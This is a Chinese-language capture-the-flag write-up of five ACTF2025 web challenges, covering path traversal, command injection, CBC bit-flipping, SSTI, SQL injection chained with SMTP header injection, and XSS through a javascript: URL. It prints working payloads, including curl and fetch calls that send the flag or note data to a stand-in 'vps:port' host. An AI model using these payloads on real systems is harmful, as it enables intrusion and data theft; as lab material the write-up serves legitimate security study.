ACTF2025 - Web writeup
ACTF upload
進去后是一個登錄界面,輸入用戶名后登錄,然后到一個文件上傳的界面。
在 /upload?file_path= 處,可以實現任意文件讀取,文件內容保存在 img 標簽中的 base64 值中。
示例請求:
/upload?file_path=../../../../../../../../etc/passwd
繼續讀取:
/proc/self/cmdline
得知 app.py 路徑,讀源碼:
import uuid
import os
import hashlib
import base64
from flask import Flask, request, redirect, url_for, flash, sessionapp = Flask(__name__)
app.secret_key = os.getenv('SECRET_KEY')@app.route('/')
def index():if session.get('username'):return redirect(url_for('upload'))else:return redirect(url_for('login'))@app.route('/login', methods=['POST', 'GET'])
def login():if request.method == 'POST':username = request.form['username']password = request.form['password']if username == 'admin':if hashlib.sha256(password.encode()).hexdigest() == '32783cef30bc23d9549623aa48aa8556346d78bd3ca604f277d63d6e573e8ce0': #backdoorsession['username'] = usernamereturn redirect(url_for('index'))else:flash('Invalid password')else:session['username'] = usernamereturn redirect(url_for('index'))else:return '''<h1>Login</h1><h2>No need to register.</h2><form action="/login" method="post"><label for="username">Username:</label><input type="text" id="username" name="username" required><br><label for="password">Password:</label><input type="password" id="password" name="password" required><br><input type="submit" value="Login"></form>'''@app.route('/upload', methods=['POST', 'GET'])
def upload():if not session.get('username'):return redirect(url_for('login'))if request.method == 'POST':f = request.files['file']file_path = str(uuid.uuid4()) + '_' + f.filenamef.save('./uploads/' + file_path)return redirect(f'/upload?file_path={file_path}')else:if not request.args.get('file_path'):return '''<h1>Upload Image</h1><form action="/upload" method="post" enctype="multipart/form-data"><input type="file" name="file"><input type="submit" value="Upload"></form>'''else:file_path = './uploads/' + request.args.get('file_path')if session.get('username') != 'admin':with open(file_path, 'rb') as f:content = f.read()b64 = base64.b64encode(content)return f'<img src="data:image/png;base64,{b64.decode()}" alt="Uploaded Image">'else:os.system(f'base64 {file_path} > /tmp/{file_path}.b64')# with open(f'/tmp/{file_path}.b64', 'r') as f:# return f'<img src="data:image/png;base64,{f.read()}" alt="Uploaded Image">'return 'Sorry, but you are not allowed to view this image.'if __name__ == '__main__':app.run(host='0.0.0.0', port=5000)
/upload 接口處,如果驗證登錄名為 admin 就可以進入 os.system 命令執行。
/login 接口處,如果賬號為 admin,密碼為 backdoor(md5 值為 32783cef30bc23d9549623aa48aa8556346d78bd3ca604f277d63d6e573e8ce0)即可登錄 admin 賬戶。
admin 登錄后,訪問:
/upload?file_path=`ls / > /tmp/1.txt`
將 ls / 的內容寫入 /tmp/1.txt
再訪問:
/upload?file_path=../../../../../../../../tmp/1.txt
發現有個 Fl4g_is_H3r3
再訪問:
/upload?file_path=../../../../../../../../Fl4g_is_H3r3
把 base64 的值解碼即得到 flag
not so web 1
一進去是 Base64 編碼的字符串,解密后是源代碼。
代碼審計發現可以先使用 CBC 翻轉攻擊 修改用戶名,然后利用 SSTI 漏洞。
我們注冊賬號如下:
- 用戶名:
zdmin - 密碼:
123456
然后復制 Cookie 并解密:
import base64
import binasciicookie = "wwMdpFGo0LWQaPsH8s2DiP+tBCDjt/Y/odSHX5NNjaycaLYsPZjrXB+1f6X1R/42nqHM+zh2JW2FuSxy5wGOkZQ57oKGceHy3u9nxPIq7h61Bgdd3zkVBbHZumF+hHGG"
decoded_data = base64.b64decode(cookie)iv = decoded_data[:16]
encrypted = decoded_data[16:]
print(decoded_data)
print(decoded_data.hex())
print("IV (hex):", iv.hex())
print("Encrypted (hex):", encrypted.hex())
運行腳本得到:
c3031da451a8d0b59068e007f2cd8388ffad0420e3b7f63fa1d4875f934d8dac9c68b62c3d98eb5c1fb57fa5f547fe369ea1ccfb3876256d85b92c72e7018e919439ee828671e1f2deef67c4f22aee1eb506075ddf391505b1d9ba617e847186
IV (hex): c3 03 1d a4 51 a8 d0 b5 90 68 fb 07f2cd8388
Encrypted (hex): ffad0420e3b7f63fa1d4875f934d8dac9c68b62c3d98eb5c1fb57fa5f547fe369ea1ccfb3876256d85b92c72e7018e919439ee828671e1f2deef67c4f22aee1eb506075ddf391505b1d9ba617e847186
根據本地嘗試數據:
{"name": "zdmin", "password_raw": "123456", "register_time": 1745636131}
應該在第 11 字節處將 z 改為 a,變為 admin。
執行異或計算:
cipher_11_hex = "fb"
cipher_11_dec = int(cipher_11_hex, 16) # 轉為十進制
print(cipher_11_dec)# 計算異或結果
result_dec = cipher_11_dec ^ ord('z') ^ ord('a')
result_hex = hex(result_dec)# 輸出結果
print(f"cipher[11] (hex): 0x{cipher_11_hex}")
print(f"ord('z'): {ord('z')} (0x{ord('z'):02x})")
print(f"ord('a'): {ord('a')} (0x{ord('a'):02x})")
print(f"Result (decimal): {result_dec}")
print(f"Result (hex): {result_hex}")
print(f"Result as char: {chr(result_dec)}")
重新構造并輸出新的 Cookie:
a = "c3031da451a8d0b59068e007f2cd8388ffad0420e3b7f63fa1d4875f934d8dac9c68b62c3d98eb5c1fb57fa5f547fe369ea1ccfb3876256d85b92c72e7018e919439ee828671e1f2deef67c4f22aee1eb506075ddf391505b1d9ba617e847186"
a_bytes = binascii.unhexlify(a) # 轉為 bytes
b = base64.b64encode(a_bytes).decode() # Base64 編碼并轉為字符串
print(b)
對比發現修改了一個字節:
原 Cookie:
wwMdpFGo0LWQaPsH8s2DiP+tBCDjt/Y/odSHX5NNjaycaLYsPZjrXB+1f6X1R/42nqHM+zh2JW2FuSxy5wGOkZQ57oKGceHy3u9nxPIq7h61Bgdd3zkVBbHZumF+hHGG修改后:
wwMdpFGo0LWQaOAH8s2DiP+tBCDjt/Y/odSHX5NNjaycaLYsPZjrXB+1f6X1R/42nqHM+zh2JW2FuSxy5wGOkZQ57oKGceHy3u9nxPIq7h61Bgdd3zkVBbHZumF+hHGG
之后觸發 SSTI 漏洞:
?payload={{url_for.__globals__.os.popen("cat flag.txt").read()}}
以下是你提供內容的純格式整理版 Markdown,僅調整結構與格式,未增刪任何原始信息:
not so web 2
發現 parse_cookie 函數的問題,驗簽函數核心在于:
PKCS1_v1_5.new(public_key).verify(msg_hash, sig)
但查看文檔得知:
也就是說,如果簽名有效,方法正常返回;如果簽名無效,方法會拋出
ValueError或TypeError異常。
因此,該函數并沒有實際的驗簽邏輯,只是判斷簽名是否有效。
我們只需要將用戶名改為 admin 并保證簽名有效即可通過驗證,之后仍然可以觸發 SSTI 漏洞。
Payload 1:
{{ lipsum["\x5f\x5fglobals\x5f\x5f"].os.popen("ls").read() }}
Payload 2:
{{ lipsum|attr("\u005f\u005fglobals\u005f\u005f")|attr("\u005f\u005fgetitem\u005f\u005f")("os")|attr("popen")("cat flag.txt")|attr("read")() }}
Excellent-Site
題目描述
127.0.0.1 ezmail.org(意思是配置了hosts)
附件如下:
import smtplib
import imaplib
import email
import sqlite3
from urllib.parse import urlparse
import requests
from email.header import decode_header
from flask import *app = Flask(__name__)def get_subjects(username, password):imap_server = "ezmail.org"imap_port = 143try:mail = imaplib.IMAP4(imap_server, imap_port)mail.login(username, password)mail.select("inbox")status, messages = mail.search(None, 'FROM "admin@ezmail.org"')if status != "OK":return ""subject = ""latest_email = messages[0].split()[-1]status, msg_data = mail.fetch(latest_email, "(RFC822)")for response_part in msg_data:if isinstance(response_part, tuple):msg = email.message_from_bytes(response_part[1])subject, encoding = decode_header(msg["Subject"])[0]if isinstance(subject, bytes):subject = subject.decode(encoding if encoding else 'utf-8')mail.logout()return subjectexcept:return "ERROR"def fetch_page_content(url):try:parsed_url = urlparse(url)if parsed_url.scheme != 'http' or parsed_url.hostname != 'ezmail.org':return "SSRF Attack!"response = requests.get(url)if response.status_code == 200:return response.textelse:return "ERROR"except:return "ERROR"@app.route("/report", methods=["GET", "POST"])
def report():message = ""if request.method == "POST":url = request.form["url"]content = request.form["content"]smtplib._quote_periods = lambda x: xmail_content = """From: ignored@ezmail.org\r\nTo: admin@ezmail.org\r\nSubject: {url}\r\n\r\n{content}\r\n.\r\n"""try:server = smtplib.SMTP("ezmail.org")mail_content = smtplib._fix_eols(mail_content)mail_content = mail_content.format(url=url, content=content)server.sendmail("ignored@ezmail.org", "admin@ezmail.org", mail_content)message = "Submitted! Now wait till the end of the world."except:message = "Send FAILED"return render_template("report.html", message=message)@app.route("/bot", methods=["GET"])
def bot():requests.get("http://ezmail.org:3000/admin")return "The admin is checking your advice(maybe)"@app.route("/admin", methods=["GET"])
def admin():ip = request.remote_addrif ip != "127.0.0.1":return "Forbidden IP"subject = get_subjects("admin", "p@ssword")if subject.startswith("http://ezmail.org"):page_content = fetch_page_content(subject)return render_template_string(f"""<h2>Newest Advice(from myself)</h2><div>{page_content}</div>""")return ""@app.route("/news", methods=["GET"])
def news():news_id = request.args.get("id")if not news_id:news_id = 1conn = sqlite3.connect("news.db")cursor = conn.cursor()cursor.execute(f"SELECT title FROM news WHERE id = {news_id}")result = cursor.fetchone()conn.close()if not result:return "Page not found.", 404return result[0]@app.route("/")
def index():return render_template("index.html")if __name__ == "__main__":app.run(host="0.0.0.0", port=3000)
/news 這里有 SQL 注入,sqlmap跑了一遍,數據庫里沒有什么有效信息。
一開始,思路主要集中在繞過waf上,但后來才想出來這里的每一個接口都是有用的:
1、通過/news可以構造返回值為任意字符,進而構造SSTI payload(從而繞過了fetch_page_content函數)
http://ezmail.org:3000/news?id=-1 UNION SELECT '{{lipsum.__globals__.os.popen("cat /flag > app.py").read()}}'
2、將構造好的payload在/report接口出以url參數替換SMTP協議部分的subject部分(payload中還需要用Resent-From頭來繞過發件人為admin@ezmail.org這個限制)
3、訪問/bot觸發SSTI,命令執行
為了正確地處理郵件的收發,我們還需要在本地搭建一個郵件服務器:
# 使用 Docker 快速部署郵件服務器
docker run -d --name ctfmail4 \-p 25:25 \-e SMTP_SERVER=ezmail.org \-e SMTP_USERNAME=admin@ezmail.org \-e SMTP_PASSWORD='p@ssword' \-e SERVER_HOSTNAME=mail.ezmail.org \juanluisbaptiste/postfix:latest
改造后的app.py,便于本地測試
import logging
import smtplib
import imaplib
import email
import sqlite3
from urllib.parse import urlparse
import requests
from email.header import decode_header
from flask import *app = Flask(__name__)
# app.logger.setLevel(logging.DEBUG)def get_subjects(username, password):imap_server = "ezmail.org"imap_port = 143try:mail = imaplib.IMAP4(imap_server, imap_port)mail.login(username, password)mail.select("inbox")status, messages = mail.search(None, 'FROM "admin@ezmail.org"')if status != "OK":return ""subject = ""latest_email = messages[0].split()[-1]status, msg_data = mail.fetch(latest_email, "(RFC822)")for response_part in msg_data:if isinstance(response_part, tuple):msg = email.message_from_bytes(response_part [1])subject, encoding = decode_header(msg["Subject"]) [0]if isinstance(subject, bytes):subject = subject.decode(encoding if encoding else 'utf-8')mail.logout()return subjectexcept:return "ERROR"#解析url,當url滿足 http & hostname=ezmail.org時,訪問url,返回網頁內容
def fetch_page_content(url):try:parsed_url = urlparse(url)if parsed_url.scheme != 'http' or parsed_url.hostname != 'ezmail.org':return "SSRF Attack!"response = requests.get(url)if response.status_code == 200:return response.textelse:return "ERROR"except:return "ERROR"@app.route("/admin", methods=["GET"])
def admin():print('admin1')ip = request.remote_addrif ip != "127.0.0.1":return "Forbidden IP"subject = get_subjects("admin", "p@ssword")if subject.startswith("http://ezmail.org"):page_content = fetch_page_content(subject)return render_template_string(f"""<h2>Newest Advice(from myself)</h2><div>{page_content}</div>""")return ""@app.route("/ssti", methods=["GET"])
def admin1():page_content = request.args.get("c")return render_template_string(f"""<h2>Newest Advice(from myself)</h2><div>{page_content}</div>""")@app.route("/report", methods=["GET", "POST"])
def report():message = ""if request.method == "POST":url = request.form["url"]content = request.form["content"]smtplib._quote_periods = lambda x: xmail_content = """From: ignored@ezmail.org\r\nTo: admin@ezmail.org\r\nSubject: {url}\r\n\r\n{content}\r\n.\r\n"""try:server = smtplib.SMTP("localhost", 1026)mail_content = smtplib._fix_eols(mail_content)mail_content = mail_content.format(url=url, content=content)print(f"mail_content is : {mail_content}")server.sendmail("ignored@ezmail.org", "admin@ezmail.org", mail_content)return mail_contentmessage = "Submitted! Now wait till the end of the world."except:message = "Send FAILED"return render_template("report.html", message=message)@app.route("/bot", methods=["GET"])
def bot():requests.get("http://ezmail.org:3000/admin")return "The admin is checking your advice(maybe)"@app.route("/test", methods=["POST"])
def fetch_page_contentTEST():url = request.form.get("url", "")print(f"[DEBUG] 收到的URL: {url}")try:parsed_url = urlparse(url)print(f"[DEBUG] 解析后的URL: {parsed_url}")print(f"[DEBUG] Scheme: {parsed_url.scheme}")print(f"[DEBUG] Hostname: {parsed_url.hostname}")if parsed_url.scheme != 'http' or parsed_url.hostname != 'ezmail.org':print("[DEBUG] URL檢測不通過,返回SSRF Attack!")return "SSRF Attack!"print(f"[DEBUG] 發送請求到: {url}")response = requests.get(url)print(f"[DEBUG] 返回狀態碼: {response.status_code}")if response.status_code == 200:print("[DEBUG] 成功拿到網頁內容")return response.textelse:print("[DEBUG] 請求失敗,狀態碼非200")return "ERROR"except Exception as e:print(f"[DEBUG] 出現異常: {e}")return "ERROR"#數據庫查詢
@app.route("/news", methods=["GET"])
def news():# return '123444'news_id = request.args.get("id")if not news_id:news_id = 1conn = sqlite3.connect("news.db")cursor = conn.cursor()cursor.execute(f"SELECT title FROM news WHERE id = {news_id}")result = cursor.fetchone()conn.close()if not result:return "Page not found.", 404return result[0]@app.route("/")
def index():return render_template("index.html")if __name__ == "__main__":app.run(host="0.0.0.0", port=3000,debug=True)最后的payload如下:
(注意payload中的端口3000,十分致命)
import time
import requestsurl = "題目地址"# SSTI Payload
payload = "{{lipsum.__globals__.os.popen(\"curl%20http://vps:port/`cat /flag|base64`\").read()}}"
# 郵件頭注入
subject = f"http://ezmail.org:3000/news?id=-1 UNION SELECT '{payload}'\r\nFrom: admin@ezmail.org\r\nResent-From: admin@ezmail.org"data = {"url": subject, "content": ""}
res_1 = requests.post(f"{url}/report", data=data)
res_2 = requests.get(f"{url}/bot")print('done.')
eznote
js偽協議
app.js
const express = require('express')
const session = require('express-session')
const { randomBytes } = require('crypto')
const fs = require('fs')
const spawn = require('child_process')
const path = require('path')
const { visit } = require('./bot')
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');const DOMPurify = createDOMPurify(new JSDOM('').window);const LISTEN_PORT = 3000
const LISTEN_HOST = '0.0.0.0'const app = express()app.set('views', './views')
app.set('view engine', 'html')
app.engine('html', require('ejs').renderFile)app.use(express.urlencoded({ extended: true }))app.use(session({secret: randomBytes(4).toString('hex'),saveUninitialized: true,resave: true,}))app.use((req, res, next) => {if (!req.session.notes) {req.session.notes = []}next()
})const notes = new Map()setInterval(() => { notes.clear() }, 60 * 1000);function toHtml(source, format){if (format == undefined) {format = 'markdown'}let tmpfile = path.join('notes', randomBytes(4).toString('hex'))fs.writeFileSync(tmpfile, source)let res = spawn.execSync(`pandoc -f ${format} ${tmpfile}`).toString()// fs.unlinkSync(tmpfile)return DOMPurify.sanitize(res)
}app.get('/ping', (req, res) => {res.send('pong')
})app.get('/', (req, res) => {res.render('index', { notes: req.session.notes })
})app.get('/notes', (req, res) => {res.send(req.session.notes)
})app.get('/note/:noteId', (req, res) => {let { noteId } = req.paramsif(!notes.has(noteId)){res.send('no such note')return} let note = notes.get(noteId)res.render('note', note)
})app.post('/note', (req, res) => {let noteId = randomBytes(8).toString('hex')let { title, content, format } = req.bodyif (!/^[0-9a-zA-Z]{1,10}$/.test(format)) {res.send("illegal format!!!")return}notes.set(noteId, {title: title,content: toHtml(content, format)})req.session.notes.push(noteId)res.send(noteId)
})app.get('/report', (req, res) => {res.render('report')
})app.post('/report', async (req, res) => {let { url } = req.bodytry {await visit(url)res.send('success')} catch (err) {console.log(err)res.send('error')}
})app.listen(LISTEN_PORT, LISTEN_HOST, () => {console.log(`listening on ${LISTEN_HOST}:${LISTEN_PORT}`)
})bot.js
const puppeteer = require('puppeteer')
const process = require('process')
const fs = require('fs')const FLAG = (() => {let flag = 'flag{test}'if (fs.existsSync('flag.txt')){flag = fs.readFileSync('flag.txt').toString()fs.unlinkSync('flag.txt')} return flag
})()const HEADLESS = !!(process.env.PROD ?? false)const sleep = (sec) => new Promise(r => setTimeout(r, sec * 1000))async function visit(url) {let browser = await puppeteer.launch({headless: HEADLESS,// executablePath: '/usr/bin/chromium',args: ['--no-sandbox'],})let page = await browser.newPage()await page.goto('http://localhost:3000/')await page.waitForSelector('#title')await page.type('#title', 'flag', {delay: 100})await page.type('#content', FLAG, {delay: 100})await page.click('#submit', {delay: 100})await sleep(3)console.log('visiting %s', url)await page.goto(url)await sleep(30)await browser.close()
}module.exports = {visit
}flag在bot.js的visit函數中作為content的值回顯
async function visit(url) {let browser = await puppeteer.launch({headless: HEADLESS,// executablePath: '/usr/bin/chromium',args: ['--no-sandbox'],})let page = await browser.newPage()await page.goto('http://localhost:3000/')await page.waitForSelector('#title')await page.type('#title', 'flag', {delay: 100})await page.type('#content', FLAG, {delay: 100})await page.click('#submit', {delay: 100})await sleep(3)console.log('visiting %s', url)await page.goto(url)await sleep(30)await browser.close()
}
而app.js中的/report接口調用了visit函數,
app.post('/report', async (req, res) => {let { url } = req.bodytry {await visit(url)res.send('success')} catch (err) {console.log(err)res.send('error')}
})
邏輯:訪問/report接口,服務器會先提交一份包含flag的筆記(但筆記對應的noteid未知),然后訪問傳入的url。
只要獲取到對應的noteid,就獲取到了flag
可以在 /report 中提交url 參數,利用javascript偽協議,通過 xss 訪問/notes接口,獲得 bot 的 noteId ,從而獲得 flag
payload:
javascript:fetch('/notes').then(r=>r.text()).then(d=>{new Image().src='http://vps:port/?data='+encodeURIComponent(d)})
![[Windows] 能同時打開多個圖片的圖像游覽器JWSEE v2.0](http://pic.xiahunao.cn/[Windows] 能同時打開多個圖片的圖像游覽器JWSEE v2.0)
![[AI Tools] Dify 工具插件上傳指南:如何將插件發布到官方市場](http://pic.xiahunao.cn/[AI Tools] Dify 工具插件上傳指南:如何將插件發布到官方市場)
--- GPT2: Language Models are Unsupervised Multitask Learners?)
![數字孿生[IOC]常用10個技術棧(總括)](http://pic.xiahunao.cn/數字孿生[IOC]常用10個技術棧(總括))
![[Windows] 東芝存儲診斷工具1.30.8920(20170601)](http://pic.xiahunao.cn/[Windows] 東芝存儲診斷工具1.30.8920(20170601))
